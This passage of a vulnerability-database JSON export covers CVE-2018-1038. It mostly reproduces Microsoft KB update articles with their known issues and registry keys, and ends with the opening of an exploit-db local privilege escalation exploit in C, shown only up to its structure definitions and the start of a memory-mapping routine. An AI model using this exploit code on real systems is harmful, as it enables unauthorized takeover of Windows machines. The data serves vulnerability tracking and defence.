is being applied only to the computers on which the antivirus ISV have updated the ALLOW REGKEY.<br/>\u00a0</td><td><p>This issue is resolved in <a data-content-id=\"4093108\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093108</a>. You no longer need the following ALLOW REGKEY to detect and be offered this update:\u00a0</p><p>HKEY_LOCAL_MACHINE\"Subkey=\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\cadca5fe-87d3-4b96-b7fb-a231484277cc</p><p><span></span></p></td></tr><tr><td><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the registry key is set to 1: \u00a0</p><p><span><span><span>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</span></span></span></p></td><td><p>This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</p></td></tr></tbody></table><p>\u00a0</p><h2>How to get this update</h2><div><p>This update is now available for installation through WSUS. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4074587\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/F/5/5/F5500476-AD7B-4C80-A330-1570D83B4734/4074587.csv\" target=\"\">file information for update 4074587</a>.</p></div></body></html>", "edition": 2, "modified": "2018-08-23T01:42:31", "id": "KB4074587", "href": "https://support.microsoft.com/en-us/help/4074587/", "published": "2018-02-13T00:00:00", "title": "February 13, 2018\u2014KB4074587 (Security-only update)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:45:47", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4074598, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><div><p>This security update includes improvements and fixes that were a part of update <a data-content-id=\"4057400\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4057400</a> (released January 19, 2018) and addresses the following issues:</p><ul><li><p>Addresses issue with editing input fields in some applications in Internet Explorer.</p></li><li><p>Addresses a script-related issue that caused Internet Explorer to stop working in some cases.</p></li><li><p>Addresses issue with launching a new page in Internet Explorer.</p></li><li>Security updates to Internet Explorer, Windows Graphics, Windows Kernel, Common Log File System driver, Microsoft Windows Search component, and Windows storage and file systems.</li></ul><p><span><span><span><span>For more information about the resolved security vulnerabilities, see the </span></span></span></span><span><span><span><a href=\"https://portal.msrc.microsoft.com/security-guidance\"><u>Security Update Guide</u></a></span></span></span><span><span><span><span>.</span></span></span></span></p></div><h2>Notes</h2><p><strong>Important\u00a0</strong>Please apply\u00a0<a data-content-id=\"4100480\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4100480</a>\u00a0immediately after applying this update. KB4100480 resolves an elevation of privilege vulnerability in the Windows Kernel for the 64-Bit (x64) version of Windows. This vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>.</p><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td>Because of an issue that affects some versions of antivirus software, this fix is being applied only to the computers on which the antivirus ISV have updated the ALLOW REGKEY.</td><td><p>This issue is resolved in <a data-content-id=\"4093118\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093118</a>. You no longer need the following ALLOW REGKEY to detect and be offered this update:\u00a0</p><p>HKEY_LOCAL_MACHINE\"Subkey=\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\cadca5fe-87d3-4b96-b7fb-a231484277cc</p><p><span></span></p></td></tr><tr><td>The LSM.EXE process and applications that call SCardEstablishContext or SCardReleaseContext may experience a handle leak. Once the leaked handle count reaches a certain threshold, smart card-based operations fail with error \"SCARD_E_NO_SERVICE\". Confirm the scenario match by reviewing the handle counts for LSM.EXE and the calling processes in the process tab of Task Manager or an equivalent application.</td><td><p>This issue is resolved in <a data-content-id=\"4091290\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4091290</a>.</p></td></tr><tr><td><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the registry key is set to 1: \u00a0</p><p><span><span><span>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</span></span></span></p></td><td><p>This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</p></td></tr></tbody></table><p>\u00a0</p></div><h2>How to get this update</h2><div><p>This update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4074598\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/0/3/7/0377D053-8FDA-4A2A-8AFF-6398527607E5/4074598.csv\" target=\"\">file information for update 4074598</a>.</p></div></body></html>", "edition": 16, "modified": "2018-08-23T01:40:46", "id": "KB4074598", "href": "https://support.microsoft.com/en-us/help/4074598/", "published": "2018-02-13T00:00:00", "title": "February 13, 2018\u2014KB4074598 (Monthly Rollup)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:53:12", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4088875, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><p>This security update includes improvements and fixes that were a part of update <a data-content-id=\"4075211\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4075211</a> (released February 21, 2018) and addresses the following issues:</p><ul><li><p>Addresses an issue in which Internet Explorer is unresponsive in certain scenarios when a Browser Helper Object is installed.</p></li><li><p>Updates legacy Document Mode cell visibility\u00a0in Internet Explorer.</p></li><li><p>Addresses an issue in which Internet Explorer stops working in certain printing scenarios.</p></li><li><p>Addresses an issue in which Internet Explorer stops working when using F12-based developer tools.</p></li><li><p>Provides cumulative Spectre and Meltdown protections for 32-Bit (x86) and 64-Bit (x64) versions of Windows except the <a data-content-id=\"4078130\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4078130</a> update that was offered to disable mitigation against Spectre Variant 2.</p></li><li><p>Provides security updates to Internet Explorer, the Microsoft Graphics component, Windows Kernel, Windows Shell, Windows MSXML, Windows Installer, and Windows Hyper-V.</p></li></ul><p>For more information about the resolved security vulnerabilities, see the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p><h2>Notes</h2><p><strong>Important\u00a0</strong>Please apply\u00a0<a data-content-id=\"4100480\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4100480</a>\u00a0immediately after applying this update. KB4100480 resolves an elevation of privilege vulnerability in the Windows Kernel for the 64-Bit (x64) version of Windows. This vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>.</p><h2>Known issues in this update</h2><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td valign=\"top\">After you install this update, security settings in some organizations that are running Windows 7 SP1 or Windows Server 2008 R2 may prevent Internet Explorer 11 from starting because of an invalid SHA1 certificate.</td><td valign=\"top\"><p>Whitelist the SHA1 certificate to allow Internet Explorer 11 to start.</p><p><span><span>- OR -</span></span></p><p><span><span>Install <a data-content-id=\"4096040\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">Cumulative update for Internet Explorer: March 23, 2018</a>.</span></span></p></td></tr><tr><td valign=\"top\"><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the registry key is set to 1: \u00a0</p><span><span><span>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</span></span></span></td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</td></tr><tr><td valign=\"top\">A Stop error occurs if this update is applied to a 32-Bit (x86) machine with the Physical Address Extension (PAE) mode disabled.</td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4093118\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093118</a>.</td></tr><tr><td valign=\"top\">A Stop error occurs on computers that don't support Streaming Single Instructions Multiple Data (SIMD) Extensions 2 (SSE2).</td><td valign=\"top\">Upgrade your machines with a processor that supports SSE2 or virtualize those machines.</td></tr><tr><td valign=\"top\">Because of an issue that affects some versions of antivirus software, this fix applies only to computers on which the antivirus ISV updated the ALLOW REGKEY.</td><td valign=\"top\"><p>This issue is resolved in <a data-content-id=\"4093118\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093118</a>. You no longer need the following ALLOW REGKEY to detect and be offered this update:\u00a0</p><p>HKEY_LOCAL_MACHINE\"Subkey=\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\cadca5fe-87d3-4b96-b7fb-a231484277cc</p><p>\u00a0</p><p>\u00a0</p></td></tr><tr><td valign=\"top\"><span>A new Ethernet Network Interface Card (NIC) that has default settings may replace the previously existing NIC, causing network issues after you apply this update. Any custom settings on the previous NIC persist in the registry but are unused.</span></td><td valign=\"top\"><p><span>This issue has been resolved in <a href=\"https://support.microsoft.com/help/4093118\" managed-link=\"\">KB4093118</a>.\u00a0\u00a0</span><span> </span></p><p>\u00a0</p></td></tr><tr><td valign=\"top\"><span>Static IP address settings are lost after you apply this update.</span></td><td valign=\"top\"><div class=\"WordSection1\"><p><span>This issue has been resolved in <a href=\"https://support.microsoft.com/help/4093118\" managed-link=\"\">KB4093118</a>. \u00a0</span></p></div></td></tr><tr><td valign=\"top\"><span>After you install this update, you may receive a Stop error message that resembles the following when you log off the computer:</span><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><span>SESSION_HAS_VALID_POOL_ON_EXIT (ab)</span></p></div></div></div></div></td><td valign=\"top\"><span>To resolve this issue, apply update <a data-content-id=\"4099467\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4099467</a>.</span></td></tr><tr><td valign=\"top\">After you apply this update, the network interface controller may stop working on some client software configurations. This occurs because of an issue related to a missing file, oem&lt;number&gt;.inf. The exact problematic configurations are currently unknown.</td><td valign=\"top\"><ol><li>To locate the network device, launch devmgmt.msc; it may appear under <strong>Other Devices</strong>.</li><li>To automatically rediscover the NIC and install drivers, select <strong>Scan for Hardware Changes</strong> from the <strong>Action</strong> menu.</li></ol><p class=\"indent-1\">a. Alternatively, install the drivers for the network device by right-clicking the device and choosing <strong>Update</strong>.<strong> </strong>Then choose <strong>Search automatically for updated driver software</strong>\u00a0or <strong>Browse my computer for driver software</strong>.</p></td></tr></tbody></table><p>\u00a0</p><h2>How to get this update</h2><div><p>This update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4088875\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/F/A/0/FA0D3F7D-5362-4A3E-91F6-1544EA04624F/4088875.csv\" target=\"\">file information for\u00a0update 4088875</a>.\u00a0</p></div></body></html>", "edition": 16, "modified": "2018-09-10T17:09:40", "id": "KB4088875", "href": "https://support.microsoft.com/en-us/help/4088875/", "published": "2018-03-13T00:00:00", "title": "March 13, 2018\u2014KB4088875 (Monthly Rollup)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:50:29", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4093118, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><p>This security update includes improvements and fixes that were a part of update <a data-content-id=\"4088881\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4088881 </a>(released March 23, 2018) and addresses the following issues:</p><ul><li><p><span>Addresses an issue where a new Ethernet Network Interface Card (NIC) that has default settings may replace the previously existing NIC, causing network issues</span></p></li><li><p><span>Addresses an issue where static IP address settings can be lost</span></p></li><li><p>Windows Update and WSUS will offer this update to applicable Windows client and server operating systems regardless of the existence or value of the \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\cadca5fe-87d3-4b96-b7fb-a231484277cc\" registry setting. This change has been made to protect user data.\u00a0</p></li><li><p>Improves reliability in the kernel,\u00a0and addresses an issue that can cause applications to have unexpected memory contents on multiprocessor systems.</p></li><li>Addresses an issue with printing content generated by ActiveX\u00a0in Internet Explorer.</li><li>Addresses\u00a0an access violation on certain pages in Internet Explorer\u00a0when it\u00a0renders\u00a0SVGs under high load.</li><li>Addresses an issue that, in some instances, prevents Internet Explorer from identifying custom controls.</li><li>Addresses a stop error that occurred when the previous month\u2019s update was applied to a 32-bit (x86) computer with a Physical Address Extension (PAE) mode disabled.</li><li>Security updates to Internet Explorer, Microsoft scripting engine, Microsoft graphics component, Windows Server, Windows datacenter networking, Windows virtualization and kernel, and Windows app platform and frameworks.</li></ul><p><span><span><span><span>For more information about the resolved security vulnerabilities, see the\u00a0</span></span></span></span><span><span><span><a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</span></span></span></p><p><strong>Note:</strong></p><ul><li>This update supercedes update\u00a0<a href=\"https://support.microsoft.com/help/4100480/\">4100480</a>,\u00a0Windows kernel update for CVE-2018-1038.</li><li>Resync is required to get newer revision of this KB for WSUS environment</li></ul><h2>Known issues in this update</h2><div><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td valign=\"top\"><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the registry key is set to 1: \u00a0</p><span><span><span>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</span></span></span></td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</td></tr><tr><td valign=\"top\">A stop error occurs on computers that don't support Streaming Single Instructions Multiple Data (SIMD) Extensions 2 (SSE2).</td><td valign=\"top\">Upgrade your machines with a processor that supports SSE2 or virtualize those machines.</td></tr><tr><td valign=\"top\">After you apply this update, the network interface controller may stop working on some client software configurations. This occurs because of an issue related to a missing file, oem&lt;number&gt;.inf. The exact problematic configurations are currently unknown.</td><td valign=\"top\"><ol><li>To locate the network device, launch devmgmt.msc; it may appear under <strong>Other Devices</strong>.</li><li>To automatically rediscover the NIC and install drivers, select <strong>Scan for Hardware Changes</strong> from the <strong>Action</strong> menu.</li></ol><p class=\"indent-1\">a. Alternatively, install the drivers for the network device by right-clicking the device and choosing <strong>Update</strong>.<strong> </strong>Then choose <strong>Search automatically for updated driver software</strong>\u00a0or <strong>Browse my computer for driver software</strong>.</p></td></tr><tr><td valign=\"top\">After installing this update, some Windows 7.0 SP1 files reverted to older versions.</td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4103713\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103713</a>.</td></tr></tbody></table></div><h2>How to get this update</h2><div><p>This update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4093118\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/B/6/4/B64EACD1-5783-49E5-9809-5C204D0924B5/4093118.csv\" target=\"\">file information for\u00a0update 4093118</a>.\u00a0</p></div></body></html>", "edition": 16, "modified": "2018-09-10T17:13:01", "id": "KB4093118", "href": "https://support.microsoft.com/en-us/help/4093118/", "published": "2018-04-10T00:00:00", "title": "April 10, 2018\u2014KB4093118 (Monthly Rollup)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T22:50:13", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-1038"], "description": "<html><body><p>Learn more about update KB4088878, including improvements and fixes, any known issues, and how to get the update.</p><h2>Improvements and fixes</h2><p>This security update includes quality improvements. No new operating system features are being introduced in this update. Important\u00a0changes include the following:</p><ul><li>Spectre and Meltdown protections for 32-Bit (x86) and 64-Bit (x64) versions of Windows, except the <a data-content-id=\"4078130\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4078130</a> update that was offered to disable mitigation against Spectre Variant 2.</li><li>Security updates to the Microsoft Graphics component, Windows Kernel, Windows Shell, Windows MSXML, Windows Installer, and Windows Hyper-V.</li></ul><p>For more information about the resolved security vulnerabilities, see the <a href=\"https://portal.msrc.microsoft.com/security-guidance\">Security Update Guide</a>.</p><h2>Notes</h2><p><strong>Important\u00a0</strong>Please apply\u00a0<a data-content-id=\"4100480\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4100480</a>\u00a0immediately after applying this update. KB4100480 resolves an elevation of privilege vulnerability in the Windows Kernel for the 64-Bit (x64) version of Windows. This vulnerability is documented in <a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-1038\" managed-link=\"\" target=\"_blank\">CVE-2018-1038</a>.</p><h2>Known issues in this update</h2><table class=\"table\"><tbody><tr><td>Symptom</td><td>Workaround</td></tr><tr><td valign=\"top\"><p>After installing KB4056897 or any other recent monthly updates, SMB servers may experience a memory leak for some scenarios. This occurs when the requested path traverses a symbolic link, mount point, or directory junction and the registry key is set to 1: \u00a0</p><span><span><span>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\LanManServer\\Parameters\\EnableEcp</span></span></span></td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4103718\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4103718</a>.</td></tr><tr><td valign=\"top\">A Stop error occurs if this update is applied to a 32-Bit (x86) computer that has the Physical Address Extension (PAE) mode disabled.</td><td valign=\"top\">This issue is resolved in <a data-content-id=\"4093108\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093108</a>.</td></tr><tr><td valign=\"top\">A Stop error occurs on computers that don't support Streaming Single Instructions Multiple Data (SIMD) Extensions 2 (SSE2).</td><td valign=\"top\">Upgrade your machines with a processor that supports SSE2 or virtualize those machines.</td></tr><tr><td valign=\"top\">Because of an issue that affects some versions of antivirus software, this fix applies only to computers on which the antivirus ISV updated the ALLOW REGKEY.</td><td valign=\"top\"><p>This issue is resolved in <a data-content-id=\"4093108\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">KB4093108</a>. You no longer need the following ALLOW REGKEY to detect and be offered this update:\u00a0</p><p>HKEY_LOCAL_MACHINE\"Subkey=\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\QualityCompat\\cadca5fe-87d3-4b96-b7fb-a231484277cc</p><p>\u00a0</p></td></tr><tr><td valign=\"top\"><span>After you apply this update, a new Ethernet Network Interface Card (NIC) that has default settings may replace the previous NIC and cause network issues. Any custom settings on the previous NIC persist in the registry but aren't used.</span></td><td valign=\"top\"><p><span><span><span><span><span> <span>This issue can be resolved by installing <a href=\"https://support.microsoft.com/en-us/help/4099950\" target=\"_blank\">KB4099950</a> prior to this update.</span> </span></span></span></span></span></p><p>\u00a0</p></td></tr><tr><td valign=\"top\"><span>Static IP address settings are lost after you apply this update.</span></td><td valign=\"top\"><div class=\"WordSection1\"><p><span><span><span><span><span><span><span><span>This issue can be resolved by installing <a href=\"https://support.microsoft.com/en-us/help/4099950\" target=\"_blank\"><u>KB4099950</u></a> prior to this update.</span></span></span></span></span></span></span></span></p></div></td></tr><tr><td valign=\"top\"><span>After you install this update, you may receive a Stop error message that resembles the following when you log off the computer: </span><span> </span><span> </span><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"row\"><div class=\"col-xs-24\"><p><span>SESSION_HAS_VALID_POOL_ON_EXIT (ab)</span></p></div></div></div></div></td><td valign=\"top\">To resolve this issue, apply update <a data-content-id=\"4099467\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"\">KB4099467</a>.</td></tr><tr><td valign=\"top\">A 32-bit (x86) computer won\u2019t boot or keeps restarting after applying this security update.</td><td valign=\"top\"><p>Before applying this security update and subsequent security updates, uninstall the following external drivers until they are fixed by the vendor that owns them:</p><ul><li>HASP Kernel Device Driver (a.k.a. Haspnt.sys)</li><li>Hard Lock Key Drivers (a.k.a. hardlock.sys)</li></ul></td></tr><tr><td valign=\"top\">After you apply this update, the network interface controller may stop working on some client software configurations. This occurs because of an issue related to a missing file, oem&lt;number&gt;.inf. The exact problematic configurations are currently unknown.</td><td valign=\"top\"><ol><li>To locate the network device, launch devmgmt.msc; it may appear under <strong>Other Devices</strong>.</li><li>To automatically rediscover the NIC and install drivers, select <strong>Scan for Hardware Changes</strong> from the <strong>Action</strong> menu.</li></ol><p class=\"indent-1\">a. Alternatively, install the drivers for the network device by right-clicking the device and choosing <strong>Update</strong>.<strong> </strong>Then choose <strong>Search automatically for updated driver software</strong>\u00a0or <strong>Browse my computer for driver software</strong>.</p></td></tr></tbody></table><h2>How to get this update</h2><div><p>This update is now available for installation through WSUS. To get the standalone package for this update, go to the\u00a0<a href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4088878\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/2/C/F/2CFE5434-3BAA-41A4-B454-CA9078F0A997/4088878.csv\" target=\"\">file information for update 4088878</a>.\u00a0</p></div></body></html>", "edition": 2, "modified": "2018-09-10T17:07:51", "id": "KB4088878", "href": "https://support.microsoft.com/en-us/help/4088878/", "published": "2018-03-13T00:00:00", "title": "March 13, 2018\u2014KB4088878 (Security-only update)", "type": "mskb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2018-05-24T14:19:45", "description": "Microsoft Windows - Local Privilege Escalation. CVE-2018-1038. Local exploit for Windows platform", "published": "2018-04-24T00:00:00", "type": "exploitdb", "title": "Microsoft Windows - Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-1038"], "modified": "2018-04-24T00:00:00", "id": "EDB-ID:44581", "href": "https://www.exploit-db.com/exploits/44581/", "sourceData": "#include \"stdafx.h\"\r\n\r\n#define\tPML4_BASE\t0xFFFFF6FB7DBED000\r\n#define\tPDP_BASE\t0xFFFFF6FB7DA00000\r\n#define\tPD_BASE\t\t0xFFFFF6FB40000000\r\n#define\tPT_BASE\t0xFFFFF68000000000\r\n\r\ntypedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;\r\n\r\n#pragma pack(push,4)\r\ntypedef struct _CM_PARTIAL_RESOURCE_DESCRIPTOR {\r\n\tUCHAR Type;\r\n\tUCHAR ShareDisposition;\r\n\tUSHORT Flags;\r\n\tunion {\r\n\t\tstruct {\r\n\t\t\tPHYSICAL_ADDRESS Start;\r\n\t\t\tULONG Length;\r\n\t\t} Generic;\r\n\r\n\t\tstruct {\r\n\t\t\tPHYSICAL_ADDRESS Start;\r\n\t\t\tULONG Length;\r\n\t\t} Port;\r\n\r\n\t\tstruct {\r\n#if defined(NT_PROCESSOR_GROUPS)\r\n\t\t\tUSHORT Level;\r\n\t\t\tUSHORT Group;\r\n#else\r\n\t\t\tULONG Level;\r\n#endif\r\n\t\t\tULONG Vector;\r\n\t\t\tKAFFINITY Affinity;\r\n\t\t} Interrupt;\r\n\r\n\t\tstruct {\r\n\t\t\tunion {\r\n\t\t\t\tstruct {\r\n#if defined(NT_PROCESSOR_GROUPS)\r\n\t\t\t\t\tUSHORT Group;\r\n#else\r\n\t\t\t\t\tUSHORT Reserved;\r\n#endif\r\n\t\t\t\t\tUSHORT MessageCount;\r\n\t\t\t\t\tULONG Vector;\r\n\t\t\t\t\tKAFFINITY Affinity;\r\n\t\t\t\t} Raw;\r\n\r\n\t\t\t\tstruct {\r\n#if defined(NT_PROCESSOR_GROUPS)\r\n\t\t\t\t\tUSHORT Level;\r\n\t\t\t\t\tUSHORT Group;\r\n#else\r\n\t\t\t\t\tULONG Level;\r\n#endif\r\n\t\t\t\t\tULONG Vector;\r\n\t\t\t\t\tKAFFINITY Affinity;\r\n\t\t\t\t} Translated;\r\n\t\t\t} DUMMYUNIONNAME;\r\n\t\t} MessageInterrupt;\r\n\r\n\t\tstruct {\r\n\t\t\tPHYSICAL_ADDRESS Start; \r\n\t\t\tULONG Length;\r\n\t\t} Memory;\r\n\r\n\t\tstruct {\r\n\t\t\tULONG Channel;\r\n\t\t\tULONG Port;\r\n\t\t\tULONG Reserved1;\r\n\t\t} Dma;\r\n\r\n\t\tstruct {\r\n\t\t\tULONG Channel;\r\n\t\t\tULONG RequestLine;\r\n\t\t\tUCHAR TransferWidth;\r\n\t\t\tUCHAR Reserved1;\r\n\t\t\tUCHAR Reserved2;\r\n\t\t\tUCHAR Reserved3;\r\n\t\t} DmaV3;\r\n\r\n\t\tstruct {\r\n\t\t\tULONG Data[3];\r\n\t\t} DevicePrivate;\r\n\r\n\t\tstruct {\r\n\t\t\tULONG Start;\r\n\t\t\tULONG Length;\r\n\t\t\tULONG Reserved;\r\n\t\t} BusNumber;\r\n\r\n\t\tstruct {\r\n\t\t\tULONG DataSize;\r\n\t\t\tULONG Reserved1;\r\n\t\t\tULONG Reserved2;\r\n\t\t} DeviceSpecificData;\r\n\r\n\t\tstruct {\r\n\t\t\tPHYSICAL_ADDRESS Start;\r\n\t\t\tULONG Length40;\r\n\t\t} Memory40;\r\n\r\n\t\tstruct {\r\n\t\t\tPHYSICAL_ADDRESS Start;\r\n\t\t\tULONG Length48;\r\n\t\t} Memory48;\r\n\r\n\t\tstruct {\r\n\t\t\tPHYSICAL_ADDRESS Start;\r\n\t\t\tULONG Length64;\r\n\t\t} Memory64;\r\n\r\n\t\tstruct {\r\n\t\t\tUCHAR Class;\r\n\t\t\tUCHAR Type;\r\n\t\t\tUCHAR Reserved1;\r\n\t\t\tUCHAR Reserved2;\r\n\t\t\tULONG IdLowPart;\r\n\t\t\tULONG IdHighPart;\r\n\t\t} Connection;\r\n\r\n\t} u;\r\n} CM_PARTIAL_RESOURCE_DESCRIPTOR, *PCM_PARTIAL_RESOURCE_DESCRIPTOR;\r\n#pragma pack(pop,4)\r\n\r\ntypedef enum _INTERFACE_TYPE {\r\n\tInterfaceTypeUndefined,\r\n\tInternal,\r\n\tIsa,\r\n\tEisa,\r\n\tMicroChannel,\r\n\tTurboChannel,\r\n\tPCIBus,\r\n\tVMEBus,\r\n\tNuBus,\r\n\tPCMCIABus,\r\n\tCBus,\r\n\tMPIBus,\r\n\tMPSABus,\r\n\tProcessorInternal,\r\n\tInternalPowerBus,\r\n\tPNPISABus,\r\n\tPNPBus,\r\n\tVmcs,\r\n\tACPIBus,\r\n\tMaximumInterfaceType\r\n} INTERFACE_TYPE, *PINTERFACE_TYPE;\r\n\r\ntypedef struct _CM_PARTIAL_RESOURCE_LIST {\r\n\tUSHORT Version;\r\n\tUSHORT Revision;\r\n\tULONG Count;\r\n\tCM_PARTIAL_RESOURCE_DESCRIPTOR PartialDescriptors[1];\r\n} CM_PARTIAL_RESOURCE_LIST, *PCM_PARTIAL_RESOURCE_LIST;\r\n\r\ntypedef struct _CM_FULL_RESOURCE_DESCRIPTOR {\r\n\tINTERFACE_TYPE InterfaceType;\r\n\tULONG BusNumber;\r\n\tCM_PARTIAL_RESOURCE_LIST PartialResourceList;\r\n} *PCM_FULL_RESOURCE_DESCRIPTOR, CM_FULL_RESOURCE_DESCRIPTOR;\r\n\r\ntypedef struct _CM_RESOURCE_LIST {\r\n\tULONG Count;\r\n\tCM_FULL_RESOURCE_DESCRIPTOR List[1];\r\n} *PCM_RESOURCE_LIST, CM_RESOURCE_LIST;\r\n\r\nstruct memory_region {\r\n\tULONG64 size;\r\n\tULONG64 address;\r\n};\r\n\r\n// Very hack'y way of trying to map out physical memory regions to try and reduce\r\n// risk of BSOD\r\nDWORD parse_memory_map(struct memory_region *regions) {\r\n\tHKEY hKey = NULL;\r\n\tLPTSTR pszSubKey = L\"Hardware\\\\ResourceMap\\\\System Resources\\\\Physical Memory\";\r\n\tLPTSTR pszValueName = L\".Translated\";\r\n\tLPBYTE lpData = 